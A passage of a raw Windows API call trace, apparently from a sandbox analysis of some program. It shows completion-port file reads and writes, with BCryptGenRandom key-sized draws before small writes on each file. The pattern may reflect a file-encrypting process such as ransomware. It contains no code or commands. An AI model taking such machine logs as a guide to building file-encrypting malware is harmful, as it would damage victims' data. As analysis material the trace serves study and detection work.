[0193.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.518] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.530] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.530] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.544] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0193.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.549] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0193.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.550] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.553] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.697] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0193.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.721] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.736] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.755] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.766] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.784] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.797] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.810] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.822] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.837] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.847] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.924] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.924] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0193.934] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3bf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0193.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0196.198] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xfc70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0196.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0196.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0196.735] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.735] free (_Block=0x3e305b8) [0196.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.735] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.736] free (_Block=0x1fa91d0) [0196.736] free (_Block=0x1fa2ed8) [0196.736] free (_Block=0x1fa90b8) [0196.736] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0196.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0196.740] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2518, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.212] CloseHandle (hObject=0x308) returned 1 [0197.213] free (_Block=0x3f70048) [0197.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.216] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0197.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.218] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0197.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.219] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.907] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xcd52, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.909] CloseHandle (hObject=0x330) returned 1 [0197.909] free (_Block=0x1ff1e60) [0197.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0197.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0197.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0197.925] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.925] free (_Block=0x3e305b8) [0197.925] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.925] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.926] free (_Block=0x1fa91d0) [0197.926] free (_Block=0x1fa2ed8) [0197.926] free (_Block=0x1fa90b8) [0197.926] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.064] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.065] CloseHandle (hObject=0x330) returned 1 [0199.065] free (_Block=0x1ff1e60) [0199.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.073] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.073] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.073] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.074] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.074] free (_Block=0x3e305b8) [0199.074] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.074] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.074] free (_Block=0x1fa91d0) [0199.074] free (_Block=0x1fa2ed8) [0199.074] free (_Block=0x1fa90b8) [0199.074] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.075] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa7d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.076] CloseHandle (hObject=0x330) returned 1 [0199.076] free (_Block=0x1ff1e60) [0199.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.083] CloseHandle (hObject=0x170) returned 1 [0199.083] free (_Block=0x3df0008) [0199.083] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.148] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x27ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.223] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.235] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x197e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.246] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.257] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x163c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.258] CloseHandle (hObject=0x330) returned 1 [0199.258] free (_Block=0x3df0008) [0199.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.266] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.266] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.266] free (_Block=0x3e305b8) [0199.266] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.266] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.267] free (_Block=0x1fa91d0) [0199.267] free (_Block=0x1fa2ed8) [0199.267] free (_Block=0x1fa90b8) [0199.267] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.280] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 